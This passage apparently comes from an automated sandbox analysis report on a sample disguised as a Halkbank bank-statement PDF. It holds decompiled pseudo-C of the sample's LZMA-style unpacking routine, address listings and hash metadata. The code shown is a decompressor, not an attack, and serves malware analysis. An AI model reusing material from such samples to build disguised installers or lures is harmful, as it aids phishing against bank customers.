							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                          0x00000000
                                          0x004070ab
                                          0x004070ab
                                          0x004070af
                                          0x00407166
                                          0x00407169
                                          0x00407175
                                          0x00407056
                                          0x00407056
                                          0x00407059
                                          0x004073cb
                                          0x004073cb
                                          0x004073ce
                                          0x004073ce
                                          0x004073d4
                                          0x004073da
                                          0x004073e0
                                          0x004073fa
                                          0x004073fd
                                          0x00407403
                                          0x0040740e
                                          0x00407410
                                          0x004073e2
                                          0x004073e2
                                          0x004073f1
                                          0x004073f5
                                          0x004073f5
                                          0x0040741a
                                          0x00407441
                                          0x00407441
                                          0x00407447
                                          0x00407447
                                          0x00000000
                                          0x0040741c
                                          0x0040741c
                                          0x00407420
                                          0x004075cf
                                          0x00000000
                                          0x004075cf
                                          0x0040742c
                                          0x00407433
                                          0x0040743b
                                          0x0040743e
                                          0x00000000
                                          0x0040743e
                                          0x004070b5
                                          0x004070b9
                                          0x004075fa
                                          0x004075fa
                                          0x004075fd
                                          0x00407601
                                          0x00407601
                                          0x004070bf
                                          0x004070c5
                                          0x004070c8
                                          0x004070cc
                                          0x004070cf
                                          0x004070d3
                                          0x00407599
                                          0x004075e5
                                          0x004075ed
                                          0x004075f4
                                          0x004075f6
                                          0x00000000
                                          0x004075f6
                                          0x004070d9
                                          0x004070dc
                                          0x004070e2
                                          0x004070e4
                                          0x004070e4
                                          0x004070e7
                                          0x004070ea
                                          0x004070ed
                                          0x004070f0
                                          0x004070f3
                                          0x004070f6
                                          0x004070f7
                                          0x004070f9
                                          0x004070f9
                                          0x004070f9
                                          0x004070fc
                                          0x004070ff
                                          0x00407102
                                          0x00407105
                                          0x00407105
                                          0x00407108
                                          0x0040710a
                                          0x0040710a
                                          0x0040710d
                                          0x0040710d
                                          0x0040710d
                                          0x00406be3
                                          0x00406be3
                                          0x00406bec
                                          0x00000000
                                          0x00000000
                                          0x00406bf2
                                          0x00000000
                                          0x00406bfd
                                          0x00000000
                                          0x00000000
                                          0x00406c06
                                          0x00406c09
                                          0x00406c0c
                                          0x00406c10
                                          0x00000000
                                          0x00000000
                                          0x00406c16
                                          0x00406c19
                                          0x00406c1b
                                          0x00406c1c
                                          0x00406c1f
                                          0x00406c21
                                          0x00406c22
                                          0x00406c24
                                          0x00406c27
                                          0x00406c2c
                                          0x00406c31
                                          0x00406c3a
                                          0x00406c4d
                                          0x00406c50
                                          0x00406c5c
                                          0x00406c84
                                          0x00406c86
                                          0x00406c94
                                          0x00406c94
                                          0x00406c98
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406c88
                                          0x00406c88
                                          0x00406c8b
                                          0x00406c8c
                                          0x00406c8c
                                          0x00000000
                                          0x00406c88
                                          0x00406c62
                                          0x00406c67
                                          0x00406c67
                                          0x00406c70
                                          0x00406c78
                                          0x00406c7b
                                          0x00000000
                                          0x00406c81
                                          0x00406c81
                                          0x00000000
                                          0x00406c81
                                          0x00000000
                                          0x00406c9e
                                          0x00406c9e
                                          0x00406ca2
                                          0x0040754e
                                          0x00000000
                                          0x0040754e
                                          0x00406cab
                                          0x00406cbb
                                          0x00406cbe
                                          0x00406cc1
                                          0x00406cc1
                                          0x00406cc1
                                          0x00406cc4
                                          0x00406cc8
                                          0x00000000
                                          0x00000000
                                          0x00406cca
                                          0x00406cd0
                                          0x00406cfa
                                          0x00406d00
                                          0x00406d07
                                          0x00000000
                                          0x00406d07
                                          0x00406cd6
                                          0x00406cd9
                                          0x00406cde
                                          0x00406cde
                                          0x00406ce9
                                          0x00406cf1
                                          0x00406cf4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406d39
                                          0x00406d3f
                                          0x00406d42
                                          0x00406d4f
                                          0x00406d57
                                          0x00000000
                                          0x00000000
                                          0x00406d0e
                                          0x00406d0e
                                          0x00406d12
                                          0x0040755d
                                          0x00000000
                                          0x0040755d
                                          0x00406d1e
                                          0x00406d29
                                          0x00406d29
                                          0x00406d29
                                          0x00406d2c
                                          0x00406d2f
                                          0x00406d32
                                          0x00406d37
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406d5f
                                          0x00406d61
                                          0x00406d64
                                          0x00406dd5
                                          0x00406dd8
                                          0x00406ddb
                                          0x00406de2
                                          0x00406dec
                                          0x00000000
                                          0x00406dec
                                          0x00406d66
                                          0x00406d6a
                                          0x00406d6d
                                          0x00406d6f
                                          0x00406d72
                                          0x00406d75
                                          0x00406d77
                                          0x00406d7a
                                          0x00406d7c
                                          0x00406d81
                                          0x00406d84
                                          0x00406d87
                                          0x00406d8b
                                          0x00406d92
                                          0x00406d95
                                          0x00406d9c
                                          0x00406da0
                                          0x00406da8
                                          0x00406da8
                                          0x00406da8
                                          0x00406da2
                                          0x00406da2
                                          0x00406da2
                                          0x00406d97
                                          0x00406d97
                                          0x00406d97
                                          0x00406dac
                                          0x00406daf
                                          0x00406dcd
                                          0x00406dcf
                                          0x00000000
                                          0x00406db1
                                          0x00406db1
                                          0x00406db4
                                          0x00406db7
                                          0x00406dba
                                          0x00406dbc
                                          0x00406dbc
                                          0x00406dbc
                                          0x00406dbf
                                          0x00406dc2
                                          0x00406dc4
                                          0x00406dc5
                                          0x00406dc8
                                          0x00000000
                                          0x00406dc8
                                          0x00000000
                                          0x00406ffe
                                          0x00407002
                                          0x00407020
                                          0x00407023
                                          0x0040702a
                                          0x0040702d
                                          0x00407030
                                          0x00407033
                                          0x00407036
                                          0x00407039
                                          0x0040703b
                                          0x00407042
                                          0x00407043
                                          0x00407045
                                          0x00407048
                                          0x0040704b
                                          0x0040704e
                                          0x0040704e
                                          0x00407053
                                          0x00000000
                                          0x00407053
                                          0x00407004
                                          0x00407007
                                          0x0040700a
                                          0x00407014
                                          0x00000000
                                          0x00000000
                                          0x00407068
                                          0x0040706c
                                          0x0040708f
                                          0x00407092
                                          0x00407095
                                          0x0040709f
                                          0x0040706e
                                          0x0040706e
                                          0x00407071
                                          0x00407074
                                          0x00407077
                                          0x00407084
                                          0x00407087
                                          0x00407087
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040711c
                                          0x00407120
                                          0x00407127
                                          0x0040712a
                                          0x0040712d
                                          0x00407137
                                          0x00000000
                                          0x00407137
                                          0x00407122
                                          0x00000000
                                          0x00000000
                                          0x00407143
                                          0x00407147
                                          0x0040714e
                                          0x00407151
                                          0x00407154
                                          0x00407149
                                          0x00407149
                                          0x00407149
                                          0x00407157
                                          0x0040715a
                                          0x0040715d
                                          0x0040715d
                                          0x00407160
                                          0x00407163
                                          0x00000000
                                          0x00000000
                                          0x00407203
                                          0x00407203
                                          0x00407207
                                          0x004075a5
                                          0x00000000
                                          0x004075a5
                                          0x0040720d
                                          0x00407210
                                          0x00407213
                                          0x00407217
                                          0x0040721a
                                          0x00407220
                                          0x00407222
                                          0x00407222
                                          0x00407222
                                          0x00407225
                                          0x00407228
                                          0x00000000
                                          0x00000000
                                          0x00406df8
                                          0x00406df8
                                          0x00406dfc
                                          0x00407569
                                          0x00000000
                                          0x00407569
                                          0x00406e02
                                          0x00406e05
                                          0x00406e08
                                          0x00406e0c
                                          0x00406e0f
                                          0x00406e15
                                          0x00406e17
                                          0x00406e17
                                          0x00406e17
                                          0x00406e1a
                                          0x00406e1d
                                          0x00406e1d
                                          0x00406e20
                                          0x00406e23
                                          0x00000000
                                          0x00000000
                                          0x00406e29
                                          0x00406e2f
                                          0x00000000
                                          0x00000000
                                          0x00406e35
                                          0x00406e35
                                          0x00406e39
                                          0x00406e3c
                                          0x00406e3f
                                          0x00406e42
                                          0x00406e45
                                          0x00406e46
                                          0x00406e49
                                          0x00406e4b
                                          0x00406e51
                                          0x00406e54
                                          0x00406e57
                                          0x00406e5a
                                          0x00406e5d
                                          0x00406e60
                                          0x00406e63
                                          0x00406e7f
                                          0x00406e82
                                          0x00406e85
                                          0x00406e88
                                          0x00406e8f
                                          0x00406e93
                                          0x00406e95
                                          0x00406e99
                                          0x00406e65
                                          0x00406e65
                                          0x00406e69
                                          0x00406e71
                                          0x00406e76
                                          0x00406e78
                                          0x00406e7a
                                          0x00406e7a
                                          0x00406e9c
                                          0x00406ea3
                                          0x00406ea6
                                          0x00000000
                                          0x00406eac
                                          0x00000000
                                          0x00406eac
                                          0x00000000
                                          0x00406eb1
                                          0x00406eb1
                                          0x00406eb5
                                          0x00407575
                                          0x00000000
                                          0x00407575
                                          0x00406ebb
                                          0x00406ebe
                                          0x00406ec1
                                          0x00406ec5
                                          0x00406ec8
                                          0x00406ece
                                          0x00406ed0
                                          0x00406ed0
                                          0x00406ed0
                                          0x00406ed3
                                          0x00406ed6
                                          0x00406ed6
                                          0x00406ed6
                                          0x00406edc
                                          0x00000000
                                          0x00000000
                                          0x00406ede
                                          0x00406ee1
                                          0x00406ee4
                                          0x00406ee7
                                          0x00406eea
                                          0x00406eed
                                          0x00406ef0
                                          0x00406ef3
                                          0x00406ef6
                                          0x00406ef9
                                          0x00406efc
                                          0x00406f14
                                          0x00406f17
                                          0x00406f1a
                                          0x00406f1d
                                          0x00406f1d
                                          0x00406f20
                                          0x00406f24
                                          0x00406f26
                                          0x00406efe
                                          0x00406efe
                                          0x00406f06
                                          0x00406f0b
                                          0x00406f0d
                                          0x00406f0f
                                          0x00406f0f
                                          0x00406f29
                                          0x00406f30
                                          0x00406f33
                                          0x00000000
                                          0x00406f35
                                          0x00000000
                                          0x00406f35
                                          0x00406f33
                                          0x00406f3a
                                          0x00406f3a
                                          0x00406f3a
                                          0x00406f3a
                                          0x00000000
                                          0x00000000
                                          0x00406f75
                                          0x00406f75
                                          0x00406f79
                                          0x00407581
                                          0x00000000
                                          0x00407581
                                          0x00406f7f
                                          0x00406f82
                                          0x00406f85
                                          0x00406f89
                                          0x00406f8c
                                          0x00406f92
                                          0x00406f94
                                          0x00406f94
                                          0x00406f94
                                          0x00406f97
                                          0x00406f9a
                                          0x00406f9a
                                          0x00406fa0
                                          0x00406f3e
                                          0x00406f3e
                                          0x00406f41
                                          0x00000000
                                          0x00406f41
                                          0x00406fa2
                                          0x00406fa2
                                          0x00406fa5
                                          0x00406fa8
                                          0x00406fab
                                          0x00406fae
                                          0x00406fb1
                                          0x00406fb4
                                          0x00406fb7
                                          0x00406fba
                                          0x00406fbd
                                          0x00406fc0
                                          0x00406fd8
                                          0x00406fdb
                                          0x00406fde
                                          0x00406fe1
                                          0x00406fe1
                                          0x00406fe4
                                          0x00406fe8
                                          0x00406fea
                                          0x00406fc2
                                          0x00406fc2
                                          0x00406fca
                                          0x00406fcf
                                          0x00406fd1
                                          0x00406fd3
                                          0x00406fd3
                                          0x00406fed
                                          0x00406ff4
                                          0x00406ff7
                                          0x00000000
                                          0x00406ff9
                                          0x00000000
                                          0x00406ff9
                                          0x00000000
                                          0x00407286
                                          0x00407286
                                          0x0040728a
                                          0x004075b1
                                          0x00000000
                                          0x004075b1
                                          0x00407290
                                          0x00407293
                                          0x00407296
                                          0x0040729a
                                          0x0040729d
                                          0x004072a3
                                          0x004072a5
                                          0x004072a5
                                          0x004072a5
                                          0x004072a8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00407395
                                          0x00407399
                                          0x004073bb
                                          0x004073be
                                          0x004073c8
                                          0x00000000
                                          0x004073c8
                                          0x0040739b
                                          0x0040739e
                                          0x004073a2
                                          0x004073a5
                                          0x004073a5
                                          0x004073a8
                                          0x00000000
                                          0x00000000
                                          0x00407452
                                          0x00407456
                                          0x00407474
                                          0x00407474
                                          0x00407474
                                          0x0040747b
                                          0x00407482
                                          0x00407489
                                          0x00407489
                                          0x00000000
                                          0x00407489
                                          0x00407458
                                          0x0040745b
                                          0x0040745e
                                          0x00407461
                                          0x00407468
                                          0x004073ac
                                          0x004073ac
                                          0x004073af
                                          0x00000000
                                          0x00000000
                                          0x00407543
                                          0x00407546
                                          0x00000000
                                          0x00000000
                                          0x0040717d
                                          0x0040717f
                                          0x00407186
                                          0x00407187
                                          0x00407189
                                          0x0040718c
                                          0x00000000
                                          0x00000000
                                          0x00407194
                                          0x00407197
                                          0x0040719a
                                          0x0040719c
                                          0x0040719e
                                          0x0040719e
                                          0x0040719f
                                          0x004071a2
                                          0x004071a9
                                          0x004071ac
                                          0x004071ba
                                          0x00000000
                                          0x00000000
                                          0x00407490
                                          0x00407490
                                          0x00407493
                                          0x0040749a
                                          0x00000000
                                          0x00000000
                                          0x0040749f
                                          0x0040749f
                                          0x004074a3
                                          0x004075db
                                          0x00000000
                                          0x004075db
                                          0x004074a9
                                          0x004074ac
                                          0x004074af
                                          0x004074b3
                                          0x004074b6
                                          0x004074bc
                                          0x004074be
                                          0x004074be
                                          0x004074be
                                          0x004074c1
                                          0x004074c4
                                          0x004074c4
                                          0x004074c4
                                          0x004074c4
                                          0x004074c7
                                          0x004074c7
                                          0x004074cb
                                          0x0040752b
                                          0x0040752e
                                          0x00407533
                                          0x00407534
                                          0x00407536
                                          0x00407538
                                          0x0040753b
                                          0x00000000
                                          0x0040753b
                                          0x004074cd
                                          0x004074d3
                                          0x004074d6
                                          0x004074d9
                                          0x004074dc
                                          0x004074df
                                          0x004074e2
                                          0x004074e5
                                          0x004074e8
                                          0x004074eb
                                          0x004074ee
                                          0x00407507
                                          0x0040750a
                                          0x0040750d
                                          0x00407510
                                          0x00407514
                                          0x00407516
                                          0x00407516
                                          0x00407517
                                          0x0040751a
                                          0x004074f0
                                          0x004074f0
                                          0x004074f8
                                          0x004074fd
                                          0x004074ff
                                          0x00407502
                                          0x00407502
                                          0x0040751d
                                          0x00407524
                                          0x00000000
                                          0x00407526
                                          0x00000000
                                          0x00407526
                                          0x00000000
                                          0x004071c2
                                          0x004071c5
                                          0x004071fb
                                          0x0040732b
                                          0x0040732b
                                          0x0040732b
                                          0x0040732b
                                          0x0040732e
                                          0x0040732e
                                          0x00407331
                                          0x00407333
                                          0x004075bd
                                          0x00000000
                                          0x004075bd
                                          0x00407339
                                          0x0040733c
                                          0x00000000
                                          0x00000000
                                          0x00407342
                                          0x00407346
                                          0x00407349
                                          0x00407349
                                          0x00407349
                                          0x00000000
                                          0x00407349
                                          0x004071c7
                                          0x004071c9
                                          0x004071cb
                                          0x004071cd
                                          0x004071d0
                                          0x004071d1
                                          0x004071d3
                                          0x004071d5
                                          0x004071d8
                                          0x004071db
                                          0x004071f1
                                          0x004071f6
                                          0x0040722e
                                          0x0040722e
                                          0x00407232
                                          0x0040725e
                                          0x00407260
                                          0x00407267
                                          0x0040726a
                                          0x0040726d
                                          0x0040726d
                                          0x00407272
                                          0x00407272
                                          0x00407274
                                          0x00407277
                                          0x0040727e
                                          0x00407281
                                          0x004072ae
                                          0x004072ae
                                          0x004072b1
                                          0x004072b4
                                          0x00407328
                                          0x00407328
                                          0x00407328
                                          0x00000000
                                          0x00407328
                                          0x004072b6
                                          0x004072bc
                                          0x004072bf
                                          0x004072c2
                                          0x004072c5
                                          0x004072c8
                                          0x004072cb
                                          0x004072ce
                                          0x004072d1
                                          0x004072d4
                                          0x004072d7
                                          0x004072f0
                                          0x004072f2
                                          0x004072f5
                                          0x004072f6
                                          0x004072f9
                                          0x004072fb
                                          0x004072fe
                                          0x00407300
                                          0x00407302
                                          0x00407305
                                          0x00407307
                                          0x0040730a
                                          0x0040730e
                                          0x00407310
                                          0x00407310
                                          0x00407311
                                          0x00407314
                                          0x00407317
                                          0x004072d9
                                          0x004072d9
                                          0x004072e1
                                          0x004072e6
                                          0x004072e8
                                          0x004072eb
                                          0x004072eb
                                          0x0040731a
                                          0x00407321
                                          0x004072ab
                                          0x004072ab
                                          0x004072ab
                                          0x004072ab
                                          0x00000000
                                          0x00407323
                                          0x00000000
                                          0x00407323
                                          0x00407321
                                          0x00407234
                                          0x00407237
                                          0x00407239
                                          0x0040723c
                                          0x0040723f
                                          0x00407242
                                          0x00407244
                                          0x00407247
                                          0x0040724a
                                          0x0040724a
                                          0x0040724d
                                          0x0040724d
                                          0x00407250
                                          0x00407257
                                          0x0040722b
                                          0x0040722b
                                          0x0040722b
                                          0x0040722b
                                          0x00000000
                                          0x00407259
                                          0x00000000
                                          0x00407259
                                          0x00407257
                                          0x004071dd
                                          0x004071e0
                                          0x004071e2
                                          0x004071e5
                                          0x00000000
                                          0x00000000
                                          0x00406f44
                                          0x00406f44
                                          0x00406f48
                                          0x0040758d
                                          0x00000000
                                          0x0040758d
                                          0x00406f4e
                                          0x00406f51
                                          0x00406f54
                                          0x00406f57
                                          0x00406f5a
                                          0x00406f5d
                                          0x00406f60
                                          0x00406f62
                                          0x00406f65
                                          0x00406f68
                                          0x00406f6b
                                          0x00406f6d
                                          0x00406f6d
                                          0x00406f6d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040734c
                                          0x0040734c
                                          0x0040734c
                                          0x00407350
                                          0x00000000
                                          0x00000000
                                          0x00407356
                                          0x00407359
                                          0x0040735c
                                          0x0040735f
                                          0x00407361
                                          0x00407361
                                          0x00407361
                                          0x00407364
                                          0x00407367
                                          0x0040736a
                                          0x0040736d
                                          0x00407370
                                          0x00407373
                                          0x00407374
                                          0x00407376
                                          0x00407376
                                          0x00407376
                                          0x00407379
                                          0x0040737c
                                          0x0040737f
                                          0x00407382
                                          0x00407385
                                          0x00407389
                                          0x0040738b
                                          0x0040738e
                                          0x00000000
                                          0x00407390
                                          0x00000000
                                          0x00407390
                                          0x0040738e
                                          0x004075c3
                                          0x00000000
                                          0x00000000
                                          0x00406bf2

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                          • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                          • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                          • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
